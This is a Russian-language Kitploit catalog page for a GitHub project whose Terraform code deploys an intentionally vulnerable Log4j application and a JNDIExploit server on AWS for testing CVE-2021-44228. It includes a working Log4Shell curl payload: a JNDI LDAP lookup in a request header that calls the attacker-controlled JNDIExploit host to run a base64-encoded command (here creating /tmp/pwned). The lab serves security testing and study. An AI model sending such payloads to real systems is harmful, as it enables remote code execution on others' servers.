Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
log4j-vulnerable-app-cve-2021-44228-terraform — Terraform для развертывания уязвимого приложения и JDNIExploit для работы с CVE-2021-44228 | Kitploit
Инструменты/GitHubGitHub/mkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform
Безопасность облачной инфраструктурыГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubmkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform

log4j-vulnerable-app-cve-2021-44228-terraform

Terraform для развертывания уязвимого приложения и JDNIExploit для работы с CVE-2021-44228

Репозиторий
2144 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

log4j-vulnerable-app-cve-2021-44228-terraform

Terraform для развертывания уязвимого приложения и JNDIExploit для работы с CVE-2021-44228

О стеке

Этот terraform создает два экземпляра в VPC в облаке AWS.

Вам просто нужно экспортировать AWS_ACCESS_KEY_ID и AWS_SECRET_ACCESS_KEY

Один экземпляр — JNDIExploit.

Второй — Vulnerable-App для эксплуатации log4j

Пожалуйста, замените свой SSH-публичный ключ в terraform перед apply

root@kitploit:~
terraform init
terraform plan
terraform apply --auto-approve

Эксплуатация

После развертывания на aws вы можете эксплуатировать его с помощью curl-запроса и проверить создание файла в /tmp в контейнере vulnerable-app.

root@kitploit:~
curl ${vulnerable-app-IP}:8090 -H 'X-Api-Version: ${jndi:ldap://${JNDIExploit-IP}:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'

На сервере уязвимого приложения выполните следующую команду, чтобы проверить выполнение команды. Вы должны увидеть файл pwned

root@kitploit:~
sudo docker exec -ti vulnerable-app ls /tmp
Скачать инструмент